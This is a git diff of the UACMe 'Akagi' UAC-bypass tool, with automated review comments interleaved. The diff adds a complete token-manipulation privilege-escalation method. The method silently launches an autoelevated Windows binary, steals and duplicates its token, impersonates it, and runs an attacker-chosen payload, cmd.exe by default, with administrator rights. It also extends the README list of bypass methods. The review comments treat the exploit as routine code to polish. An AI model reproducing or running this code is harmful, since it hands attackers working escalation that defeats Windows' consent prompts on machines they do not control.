diff --git a/Compiled/Akagi32.exe b/Compiled/Akagi32.exe
index 13833d1..359314e 100644
Binary files a/Compiled/Akagi32.exe and b/Compiled/Akagi32.exe differ
diff --git a/Compiled/Akagi64.exe b/Compiled/Akagi64.exe
index a9c6d66..589d08b 100644
Binary files a/Compiled/Akagi64.exe and b/Compiled/Akagi64.exe differ
diff --git a/README.md b/README.md
index eb3b75b..de55f61 100644
--- a/README.md
+++ b/README.md
@@ -288,6 +288,15 @@ Keys (watch debug output with dbgview or similar for more info):
* AlwaysNotify compatible
* Fixed in: unfixed :see_no_evil:
* How: -
+35. Author: CIA & James Forshaw
+ * Type: Impersonation
+ * Method: Token Manipulations
+ * Target(s): Autoelevated applications
+ * Component(s): Attacker defined applications
+ * Works from: Windows 7 (7600)
+ * AlwaysNotify compatible, see note
+ * Fixed in: unfixed :see_no_evil:
+ * How: -
Note:
* Method (6) unavailable in wow64 environment starting from Windows 8;
@@ -295,7 +304,8 @@ Note:
* Method (13) (19) and above implemented only in x64 version;
* Method (14) require process injection, wow64 unsupported, use x64 version of this tool;
* Method (26) is still working, however it main advantage was UAC bypass on AlwaysNotify level. Since 15031 it is gone;
-* Method (30) require x64 because it abuses WOW64 subsystem feature.
+* Method (30) require x64 because it abuses WOW64 subsystem feature;
+* Method (35) AlwaysNotify compatible as there always will be running autoelevated apps or user will have to launch them anyway.
Run examples:
* akagi32.exe 1
@@ -317,7 +327,6 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
# Protection
-* UAC turned on maximum level and full awareness about every window it will show;
* Account without administrative privileges.
# Malware usage
@@ -348,7 +357,11 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
* UAC Bypass or story about three escalations, https://habrahabr.ru/company/pm/blog/328008/
* Exploiting Environment Variables in Scheduled Tasks for UAC Bypass, https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html
* First entry: Welcome and fileless UAC bypass, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
-
+* Reading Your Way Around UAC in 3 parts:
+ 1. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html
+ 2. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html
+ 3. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html
+
# Authors
(c) 2014 - 2017 UACMe Project
diff --git a/Source/Akagi/Resource.rc b/Source/Akagi/Resource.rc
index 8645796..7275d07 100644
Binary files a/Source/Akagi/Resource.rc and b/Source/Akagi/Resource.rc differ
diff --git a/Source/Akagi/methods/enigma0x3.c b/Source/Akagi/methods/enigma0x3.c
index 707cb43..4510c90 100644
--- a/Source/Akagi/methods/enigma0x3.c
+++ b/Source/Akagi/methods/enigma0x3.c
@@ -4,9 +4,9 @@
*
* TITLE: ENIGMA0X3.C
*
-* VERSION: 2.72
+* VERSION: 2.73
*
-* DATE: 26 May 2017
+* DATE: 27 May 2017
*
* Enigma0x3 autoelevation methods and everything based on the same
* ShellExecute related registry manipulations idea.
@@ -477,16 +477,16 @@ BOOL ucmSdcltIsolatedCommandMethod(
if (lpszPayload != NULL) {
lpBuffer = lpszPayload;
- sz = _strlen(lpszPayload);
}
else {
//no payload specified, use default cmd.exe
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
supExpandEnvironmentStrings(T_DEFAULT_CMD, szBuffer, MAX_PATH);
- sz = _strlen(szBuffer);
lpBuffer = szBuffer;
}
+ sz = _strlen(lpBuffer);
+
lResult = RegCreateKeyEx(HKEY_CURRENT_USER, T_EXEFILE_SHELL, 0, NULL,
REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, NULL);
@@ -586,16 +586,16 @@ BOOL ucmMsSettingsDelegateExecuteMethod(
if (lpszPayload != NULL) {
lpBuffer = lpszPayload;
- sz = _strlen(lpszPayload);
}
else {
//no payload specified, use default cmd.exe
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
supExpandEnvironmentStrings(T_DEFAULT_CMD, szBuffer, MAX_PATH);
- sz = _strlen(szBuffer);
lpBuffer = szBuffer;
}
+ sz = _strlen(lpBuffer);
+
_strcpy(szKey, T_MSSETTINGS);
_strcat(szKey, T_SHELL_OPEN_COMMAND);
lResult = RegCreateKeyEx(HKEY_CURRENT_USER, szKey, 0, NULL,
diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c
index 23009fd..f73413d 100644
--- a/Source/Akagi/methods/methods.c
+++ b/Source/Akagi/methods/methods.c
@@ -4,9 +4,9 @@
*
* TITLE: METHODS.C
*
-* VERSION: 2.72
+* VERSION: 2.73
*
-* DATE: 26 May 2017
+* DATE: 27 May 2017
*
* UAC bypass dispatch.
*
@@ -46,6 +46,7 @@ UCM_API(MethodEnigma0x3_4);
UCM_API(MethodUiAccess);
UCM_API(MethodMsSettings);
UCM_API(MethodTyranid);
+UCM_API(MethodTokenMod);
UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
@@ -82,7 +83,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodEnigma0x3_4, NULL, {10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodUiAccess, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodMsSettings, NULL, { 10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
- { MethodTyranid, NULL, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }
+ { MethodTyranid, NULL, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
+ { MethodTokenMod, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }
};
/*
@@ -664,3 +666,23 @@ UCM_API(MethodTyranid)
return ucmDiskCleanupEnvironmentVariable(lpszPayload);
}
+
+UCM_API(MethodTokenMod)
+{
+ LPWSTR lpszPayload = NULL;
+
+ UNREFERENCED_PARAMETER(Method);
+ UNREFERENCED_PARAMETER(ExtraContext);
+ UNREFERENCED_PARAMETER(PayloadCode);
+ UNREFERENCED_PARAMETER(PayloadSize);
+
+ //
+ // Select target application or use given by optional parameter.
+ //
+ if (g_ctx.OptionalParameterLength == 0)
+ lpszPayload = NULL;
+ else
+ lpszPayload = g_ctx.szOptionalParameter;
+
+ return ucmTokenModification(lpszPayload);
+}
diff --git a/Source/Akagi/methods/methods.h b/Source/Akagi/methods/methods.h
index 601ba7e..8e18875 100644
--- a/Source/Akagi/methods/methods.h
+++ b/Source/Akagi/methods/methods.h
@@ -4,9 +4,9 @@
*
* TITLE: METHODS.H
*
-* VERSION: 2.72
+* VERSION: 2.73
*
-* DATE: 26 May 2017
+* DATE: 27 May 2017
*
* Prototypes and definitions for UAC bypass methods table.
*
@@ -54,6 +54,7 @@ typedef enum _UCM_METHOD {
UacMethodUiAccess, //+
UacMethodMsSettings, //+
UacMethodTyranid, //+
+ UacMethodTokenMod, //+
UacMethodMax
} UCM_METHOD;
diff --git a/Source/Akagi/methods/tyranid.c b/Source/Akagi/methods/tyranid.c
index 2bf4832..7e3be40 100644
--- a/Source/Akagi/methods/tyranid.c
+++ b/Source/Akagi/methods/tyranid.c
@@ -1,14 +1,15 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2016 - 2017
+* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: TYRANID.C
*
-* VERSION: 2.72
+* VERSION: 2.73
*
-* DATE: 26 May 2017
+* DATE: 27 May 2017
*
* James Forshaw autoelevation method(s)
+* Fine Dinning Tool (c) CIA
*
* For description please visit original URL
* https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html
@@ -21,14 +22,12 @@
*******************************************************************************/
#include "global.h"
-
/*
* ucmDiskCleanupEnvironmentVariable
*
* Purpose:
*
-* Use cleanmgr innovation implemented in Windows 10+.
-* Cleanmgr.exe uses current user environment variables to build a path to the executable task.
+* DiskCleanup task uses current user environment variables to build a path to the executable.
* Warning: this method works with AlwaysNotify UAC level.
*
*/
@@ -81,3 +80,226 @@ BOOL ucmDiskCleanupEnvironmentVariable(
return bResult;
}
+
+/*
+* ucmTokenModification
+*
+* Purpose:
+*
+* Obtains the token from an auto-elevated process, modifies it, and reuses it to execute as administrator.
+*
+*/
+BOOL ucmTokenModification(
+ _In_opt_ LPWSTR lpszPayload
+)
+{
+ BOOL bCond = FALSE, bResult = FALSE;
+ NTSTATUS Status = STATUS_UNSUCCESSFUL;
+ HANDLE hProcessToken = NULL, hDupToken = NULL, hLuaToken = NULL, hImpToken = NULL;
+
+ SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
+ PSID pIntegritySid = NULL;
+ TOKEN_MANDATORY_LABEL tml;
+ SECURITY_QUALITY_OF_SERVICE sqos;
+ OBJECT_ATTRIBUTES obja;
+
+ LPWSTR lpBuffer = NULL;
+
+ STARTUPINFO si;
+ PROCESS_INFORMATION pi;
+ SHELLEXECUTEINFO shinfo;
+ WCHAR szBuffer[MAX_PATH + 1];
+
+ RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
+
+ do {
+
+ if (lpszPayload != NULL) {
+ lpBuffer = lpszPayload;
+ }
+ else {
+ //no payload specified, use default cmd.exe
+ RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
+ supExpandEnvironmentStrings(T_DEFAULT_CMD, szBuffer, MAX_PATH);
+ lpBuffer = szBuffer;
+ }
+
+ //
+ // Run autoelevated app (any).
+ //
+ shinfo.cbSize = sizeof(shinfo);
+ shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
+ shinfo.lpFile = WUSA_EXE;
+ shinfo.nShow = SW_HIDE;
+ if (!ShellExecuteEx(&shinfo)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->ShellExecute"),
+ GetLastError());
+#endif
+ break;
+ }
+
+ //
+ // Open token of elevated process.
+ //
+ Status = NtOpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken);
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->NtOpenProcessToken"),
+ Status);
+#endif
+ break;
+ }
+
+ //
+ // Duplicate primary token.
+ //
+ sqos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
+ sqos.ImpersonationLevel = SecurityImpersonation;
+ sqos.ContextTrackingMode = 0;
+ sqos.EffectiveOnly = FALSE;
+ InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);
+ obja.SecurityQualityOfService = &sqos;
+ Status = NtDuplicateToken(hProcessToken, TOKEN_ALL_ACCESS, &obja, FALSE, TokenPrimary, &hDupToken);
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->NtDuplicateToken"),
+ Status);
+#endif
+ break;
+ }
+
+ //
+ // Lower duplicated token IL from High to Medium.
+ //
+ Status = RtlAllocateAndInitializeSid(&MLAuthority,
+ 1, SECURITY_MANDATORY_MEDIUM_RID,
+ 0, 0, 0, 0, 0, 0, 0,
+ &pIntegritySid);
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->RtlAllocateAndInitializeSid"),
+ Status);
+#endif
+ break;
+ }
+
+ tml.Label.Attributes = SE_GROUP_INTEGRITY;
+ tml.Label.Sid = pIntegritySid;
+
+ Status = NtSetInformationToken(hDupToken, TokenIntegrityLevel, &tml,
+ sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid));
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->NtSetInformationToken"),
+ Status);
+#endif
+ break;
+ }
+
+ //
+ // Create restricted token.
+ //
+ Status = NtFilterToken(hDupToken, LUA_TOKEN, NULL, NULL, NULL, &hLuaToken);
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->NtFilterToken"),
+ Status);
+#endif
+ break;
+ }
+
+ //
+ // Impersonate logged on user.
+ //
+ hImpToken = NULL;
+ Status = NtDuplicateToken(hLuaToken, TOKEN_IMPERSONATE | TOKEN_QUERY,
+ &obja,
+ FALSE,
+ TokenImpersonation,
+ &hImpToken);
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->NtDuplicateToken2"),
+ Status);
+#endif
+ break;
+ }
+
+ Status = NtSetInformationThread(
+ NtCurrentThread(),
+ ThreadImpersonationToken,
+ &hImpToken,
+ sizeof(HANDLE));
+
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->NtSetInformationThread"),
+ Status);
+#endif
+ break;
+ }
+
+ NtClose(hImpToken);
+ hImpToken = NULL;
+
+ //
+ // Run target.
+ //
+ RtlSecureZeroMemory(&si, sizeof(si));
+ si.cb = sizeof(si);
+ GetStartupInfo(&si);
+
+ si.dwFlags = STARTF_USESHOWWINDOW;
+ si.wShowWindow = SW_SHOW;
+
+ RtlSecureZeroMemory(&pi, sizeof(pi));
+
+ bResult = CreateProcessWithLogonW(TEXT("uac"), TEXT("is"), TEXT("useless"),
+ LOGON_NETCREDENTIALS_ONLY,
+ lpBuffer,
+ NULL, 0, NULL, NULL,
+ &si, &pi);
+
+ if (bResult) {
+ if (pi.hThread) CloseHandle(pi.hThread);
+ if (pi.hProcess) CloseHandle(pi.hProcess);
+ }
+
+ //
+ // Revert to self.
+ //
+ hImpToken = NULL;
+ Status = NtSetInformationThread(
+ NtCurrentThread(),
+ ThreadImpersonationToken,
+ (PVOID)&hImpToken,
+ sizeof(HANDLE));
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->NtSetInformationThread2"),
+ Status);
+#endif
+ }
+
+ } while (bCond);
+
+ if (hImpToken) NtClose(hImpToken);
+ if (hProcessToken) NtClose(hProcessToken);
+ if (hDupToken) NtClose(hDupToken);
+ if (hLuaToken) NtClose(hLuaToken);
+ if (shinfo.hProcess) NtClose(shinfo.hProcess);
+ if (pIntegritySid) RtlFreeSid(pIntegritySid);
+
+ RtlSetLastWin32Error(RtlNtStatusToDosError(Status));
+ return bResult;
+}
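Review bot: The `Purpose:` block at the head of ucmTokenModification documents the token steps but not the function's observable side effects, which a reader or an analyst triaging this code needs: the helper started via `ShellExecuteEx` (`shinfo.lpFile = WUSA_EXE`, `SW_HIDE`) is never terminated — only its handle is released by `if (shinfo.hProcess) NtClose(shinfo.hProcess);` — so it is still running when the function returns, and the calling thread's impersonation token is set with NtSetInformationThread and reverted before exit. Add a line to the header such as `* Side effects: leaves the process started via ShellExecuteEx running; sets and then reverts the calling thread's impersonation token.` It would also help to state that `bResult` reflects only CreateProcessWithLogonW, since every earlier failure leaves it FALSE without distinguishing which step broke.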
diff --git a/Source/Akagi/methods/tyranid.h b/Source/Akagi/methods/tyranid.h
index da1b5b5..4f1245d 100644
--- a/Source/Akagi/methods/tyranid.h
+++ b/Source/Akagi/methods/tyranid.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2016 - 2017
+* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: TYRANID.H
*
-* VERSION: 2.72
+* VERSION: 2.73
*
-* DATE: 26 May 2017
+* DATE: 27 May 2017
*
* Prototypes and definitions for James Forshaw method(s).
*
@@ -20,3 +20,6 @@
BOOL ucmDiskCleanupEnvironmentVariable(
_In_opt_ LPWSTR lpszPayload);
+
+BOOL ucmTokenModification(
+ _In_opt_ LPWSTR lpszPayload);
diff --git a/Source/Hibiki/hibiki.suppress b/Source/Hibiki/hibiki.suppress
new file mode 100644
index 0000000..5340957
--- /dev/null
+++ b/Source/Hibiki/hibiki.suppress
@@ -0,0 +1,50 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 2
+
+
+ rtltypes.h
+ V112
+ Dangerous magic number _x_ used: return c + _x_;.
+ 172268903
+ 355059
+ 539
+
+
\ No newline at end of file
diff --git a/Source/Inazuma/main.c b/Source/Inazuma/main.c
index 658912b..a1ec895 100644
--- a/Source/Inazuma/main.c
+++ b/Source/Inazuma/main.c
@@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
-* VERSION: 2.70
+* VERSION: 2.73
*
-* DATE: 24 Mar 2017
+* DATE: 27 May 2017
*
* ShellCode.
*
@@ -19,6 +19,10 @@
//disable nonmeaningful warnings.
#pragma warning(disable: 4005) // macro redefinition
+#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s
+#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
+#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
+#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#include
#include "shared\ntos.h"
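Review bot: `#pragma warning(disable: 6102)` silences the code-analysis finding "Using %s from failed function call" for the whole translation unit, and unlike 4055/4152/4201 (nonstandard-extension notices) that one points at a real correctness pattern, so disabling it file-wide hides future call sites as well. Prefer a per-site `#pragma warning(suppress: 6102)` immediately above each call whose failure result is deliberately consumed, with a one-line reason. If the file-wide disable is kept, extend the trailing comment with the rationale, e.g. `// 6102: failed-call results are intentionally used here -- see <reason>`, so the suppression is reviewable.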
diff --git a/Source/Naka/Naka.vcxproj b/Source/Naka/Naka.vcxproj
index 48099ca..f81b7aa 100644
--- a/Source/Naka/Naka.vcxproj
+++ b/Source/Naka/Naka.vcxproj
@@ -5,6 +5,14 @@
Debug
Win32
+
+ ReleaseInternal
+ Win32
+
+
+ ReleaseInternal
+ x64
+
Release
Win32
@@ -38,6 +46,13 @@
true
Unicode
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
Application
true
@@ -51,6 +66,13 @@
true
Unicode
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
@@ -62,12 +84,18 @@
+
+
+
+
+
+
true
@@ -90,6 +118,13 @@
$(ProjectName)32
AllRules.ruleset
+
+ false
+ .\output\$(Platform)\$(Configuration)\
+ .\output\$(Platform)\$(Configuration)\
+ $(ProjectName)32
+ AllRules.ruleset
+
false
.\output\$(Platform)\$(Configuration)\
@@ -97,6 +132,13 @@
$(ProjectName)64
AllRules.ruleset
+
+ false
+ .\output\$(Platform)\$(Configuration)\
+ .\output\$(Platform)\$(Configuration)\
+ $(ProjectName)64
+ AllRules.ruleset
+
@@ -130,6 +172,32 @@
+
+ Level4
+
+
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
+ true
+ CompileAsC
+ $(SolutionDir)
+
+
+ Windows
+ true
+ true
+ false
+ true
+ main
+
+
+
+
+
+
+
Level4
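Review bot: The new ReleaseInternal|Win32 configuration defines only `WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)`, and the ReleaseInternal|x64 block in the next hunk likewise defines only `NDEBUG;_WINDOWS;%(PreprocessorDefinitions)`; as far as this hunk shows, both are identical to a plain Release build. If ReleaseInternal is meant to enable the internal diagnostics that the Akagi sources gate on `_INT_DEBUG`, that define is missing here; if the configuration is intentionally identical for this project, a short comment in the project file saying so would save the next reader the comparison. The surrounding element tags are not visible in this rendering, so the exact property being set is inferred.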
@@ -155,6 +223,32 @@
+
+ Level4
+
+
+ MaxSpeed
+ true
+ true
+ NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
+ true
+ CompileAsC
+ $(SolutionDir)
+
+
+ Windows
+ true
+ true
+ false
+ true
+ main
+
+
+
+
+
+
+
Level4
diff --git a/Source/Shared/ntos.h b/Source/Shared/ntos.h
index 5b77c7d..8e4dc24 100644
--- a/Source/Shared/ntos.h
+++ b/Source/Shared/ntos.h
@@ -4,9 +4,9 @@
*
* TITLE: NTOS.H
*
-* VERSION: 1.66
+* VERSION: 1.70
*
-* DATE: 02 May 2017
+* DATE: 27 May 2017
*
* Common header file for the ntos API functions and definitions.
*
@@ -1142,6 +1142,37 @@ typedef struct _OBJECT_HANDLE_FLAG_INFORMATION
** Objects END
*/
+/*
+** Boot Entry START
+*/
+
+typedef struct _FILE_PATH {
+ ULONG Version;
+ ULONG Length;
+ ULONG Type;
+ UCHAR FilePath[ANYSIZE_ARRAY];
+} FILE_PATH, *PFILE_PATH;
+
+typedef struct _BOOT_ENTRY {
+ ULONG Version;
+ ULONG Length;
+ ULONG Id;
+ ULONG Attributes;
+ ULONG FriendlyNameOffset;
+ ULONG BootFilePathOffset;
+ ULONG OsOptionsLength;
+ UCHAR OsOptions[ANYSIZE_ARRAY];
+} BOOT_ENTRY, *PBOOT_ENTRY;
+
+typedef struct _BOOT_ENTRY_LIST {
+ ULONG NextEntryOffset;
+ BOOT_ENTRY BootEntry;
+} BOOT_ENTRY_LIST, *PBOOT_ENTRY_LIST;
+
+/*
+** Boot Entry END
+*/
+
/*
** File start
*/
@@ -4602,7 +4633,7 @@ BOOLEAN NTAPI RtlCreateUnicodeString(
VOID NTAPI RtlInitUnicodeString(
_Inout_ PUNICODE_STRING DestinationString,
- _In_ PCWSTR SourceString
+ _In_opt_ PCWSTR SourceString
);
BOOLEAN NTAPI RtlEqualUnicodeString(
@@ -5557,14 +5588,50 @@ NTSTATUS NTAPI NtMapViewOfSection(
NTSTATUS NTAPI NtUnmapViewOfSection(
_In_ HANDLE ProcessHandle,
_In_ PVOID BaseAddress
- );
+ );
NTSTATUS NTAPI NtOpenProcessToken(
- _In_ HANDLE ProcessHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _Out_ PHANDLE TokenHandle
- );
+ _In_ HANDLE ProcessHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE TokenHandle
+ );
+NTSTATUS NTAPI NtDuplicateToken(
+ _In_ HANDLE ExistingTokenHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ BOOLEAN EffectiveOnly,
+ _In_ TOKEN_TYPE TokenType,
+ _Out_ PHANDLE NewTokenHandle
+ );
+
+NTSTATUS NTAPI NtFilterToken(
+ _In_ HANDLE ExistingTokenHandle,
+ _In_ ULONG Flags,
+ _In_opt_ PTOKEN_GROUPS SidsToDisable,
+ _In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete,
+ _In_opt_ PTOKEN_GROUPS RestrictedSids,
+ _Out_ PHANDLE NewTokenHandle
+ );
+
+NTSTATUS NTAPI NtImpersonateAnonymousToken(
+ _In_ HANDLE ThreadHandle
+ );
+
+NTSTATUS NTAPI NtQueryInformationToken(
+ _In_ HANDLE TokenHandle,
+ _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
+ _Out_ PVOID TokenInformation,
+ _In_ ULONG TokenInformationLength,
+ _Out_ PULONG ReturnLength
+ );
+
+NTSTATUS NTAPI NtSetInformationToken(
+ _In_ HANDLE TokenHandle,
+ _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
+ _In_ PVOID TokenInformation,
+ _In_ ULONG TokenInformationLength
+ );
NTSTATUS NTAPI NtOpenThreadTokenEx(
_In_ HANDLE ThreadHandle,
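Review bot: The `NtQueryInformationToken` prototype added in this hunk duplicates one that already exists further down — the next hunk's header `@@ -5591,6 +5658,20 @@ NTSTATUS NTAPI NtQueryInformationToken(` shows its `_Out_ PULONG ReturnLength );` tail as context — and `NtFilterToken` is declared here and again in that next hunk after the `LUA_TOKEN` defines. Identical redeclarations compile in C, but two copies drift: keep one `NtFilterToken` (the one next to its flag macros reads best) and drop the added `NtQueryInformationToken` in favour of the existing one.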
@@ -5591,6 +5658,20 @@ NTSTATUS NTAPI NtQueryInformationToken(
_Out_ PULONG ReturnLength
);
+#define DISABLE_MAX_PRIVILEGE 0x1 // winnt
+#define SANDBOX_INERT 0x2 // winnt
+#define LUA_TOKEN 0x4
+#define WRITE_RESTRICT 0x8
+
+NTSTATUS NTAPI NtFilterToken(
+ _In_ HANDLE ExistingTokenHandle,
+ _In_ ULONG Flags,
+ _In_opt_ PTOKEN_GROUPS SidsToDisable,
+ _In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete,
+ _In_opt_ PTOKEN_GROUPS RestrictedSids,
+ _Out_ PHANDLE NewTokenHandle
+ );
+
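Review bot: The 0x8 filter flag is spelled `WRITE_RESTRICTED` in winnt.h, so the `WRITE_RESTRICT` name introduced here will not match the SDK constant when someone greps or includes both headers. The `// winnt` marker is also applied only to the first two defines, although all four (`DISABLE_MAX_PRIVILEGE`, `SANDBOX_INERT`, `LUA_TOKEN`, `WRITE_RESTRICTED`) are winnt.h names; either rename to `#define WRITE_RESTRICTED 0x8 // winnt` and mark `LUA_TOKEN` the same way, or wrap the block in `#ifndef LUA_TOKEN` so it only fills in when winnt.h is not in scope. The `NtFilterToken` prototype below the macros repeats the one added in the previous hunk.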
NTSTATUS NTAPI NtCreateKey(
_Out_ PHANDLE KeyHandle,
_In_ ACCESS_MASK DesiredAccess,
@@ -5691,19 +5772,6 @@ NTSTATUS NTAPI NtQueryFullAttributesFile(
__out PFILE_NETWORK_OPEN_INFORMATION FileInformation
);
-NTSTATUS NTAPI NtFsControlFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG FsControlCode,
- _In_ PVOID InputBuffer,
- _In_ ULONG InputBufferLength,
- _Out_ PVOID OutputBuffer,
- _In_ ULONG OutputBufferLength
- );
-
NTSTATUS NTAPI NtQueryDirectoryFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
@@ -5888,6 +5956,32 @@ NTSTATUS NTAPI NtCreateFile(
_In_ ULONG EaLength
);
+NTSTATUS NTAPI NtDeviceIoControlFile(
+ _In_ HANDLE FileHandle,
+ _In_ HANDLE Event,
+ _In_ PIO_APC_ROUTINE ApcRoutine,
+ _In_ PVOID ApcContext,
+ _Out_ PIO_STATUS_BLOCK IoStatusBlock,
+ _In_ ULONG IoControlCode,
+ _In_ PVOID InputBuffer,
+ _In_ ULONG InputBufferLength,
+ _Out_ PVOID OutputBuffer,
+ _In_ ULONG OutputBufferLength
+ );
+
+NTSTATUS NTAPI NtFsControlFile(
+ _In_ HANDLE FileHandle,
+ _In_opt_ HANDLE Event,
+ _In_opt_ PIO_APC_ROUTINE ApcRoutine,
+ _In_opt_ PVOID ApcContext,
+ _Out_ PIO_STATUS_BLOCK IoStatusBlock,
+ _In_ ULONG FsControlCode,
+ _In_opt_ PVOID InputBuffer,
+ _In_ ULONG InputBufferLength,
+ _Out_opt_ PVOID OutputBuffer,
+ _In_ ULONG OutputBufferLength
+ );
+
NTSTATUS NTAPI NtCreateUserProcess(
_Out_ PHANDLE ProcessHandle,
_Out_ PHANDLE ThreadHandle,
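Review bot: The new `NtDeviceIoControlFile` prototype annotates `Event`, `ApcRoutine` and `ApcContext` as `_In_` while the `NtFsControlFile` prototype added directly below it marks the same three parameters `_In_opt_` and its buffers `_In_opt_`/`_Out_opt_`; the two calls share the same argument shape and callers routinely pass NULL for the event and APC parameters, so SAL will flag every such call against this declaration. Change the three to `_In_opt_ HANDLE Event,`, `_In_opt_ PIO_APC_ROUTINE ApcRoutine,`, `_In_opt_ PVOID ApcContext,` and consider the same optional annotations on `InputBuffer`/`OutputBuffer` for consistency with NtFsControlFile.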
@@ -6177,34 +6271,29 @@ NTSTATUS NTAPI NtAcceptConnectPort(
_In_ PPORT_MESSAGE ConnectionRequest,
_In_ BOOLEAN AcceptConnection,
_Inout_opt_ PPORT_VIEW ServerView,
- _Out_opt_ PREMOTE_PORT_VIEW ClientView
- );
+ _Out_opt_ PREMOTE_PORT_VIEW ClientView);
typedef
VOID
(*PPS_APC_ROUTINE) (
_In_opt_ PVOID ApcArgument1,
_In_opt_ PVOID ApcArgument2,
- _In_opt_ PVOID ApcArgument3
- );
+ _In_opt_ PVOID ApcArgument3);
NTSTATUS NTAPI NtQueueApcThread(
_In_ HANDLE ThreadHandle,
_In_ PPS_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcArgument1,
_In_opt_ PVOID ApcArgument2,
- _In_opt_ PVOID ApcArgument3
- );
+ _In_opt_ PVOID ApcArgument3);
NTSTATUS NTAPI NtWaitForSingleObject(
_In_ HANDLE Handle,
_In_ BOOLEAN Alertable,
- _In_opt_ PLARGE_INTEGER Timeout
- );
+ _In_opt_ PLARGE_INTEGER Timeout);
NTSTATUS NTAPI NtYieldExecution(
- VOID
- );
+ VOID);
NTSTATUS NTAPI NtCreateMailslotFile(
_Out_ PHANDLE FileHandle,
@@ -6214,8 +6303,7 @@ NTSTATUS NTAPI NtCreateMailslotFile(
_In_ ULONG CreateOptions,
_In_ ULONG MailslotQuota,
_In_ ULONG MaximumMessageSize,
- _In_ PLARGE_INTEGER ReadTimeout
-);
+ _In_ PLARGE_INTEGER ReadTimeout);
NTSTATUS NTAPI NtSecureConnectPort(
_Out_ PHANDLE PortHandle,
@@ -6226,5 +6314,9 @@ NTSTATUS NTAPI NtSecureConnectPort(
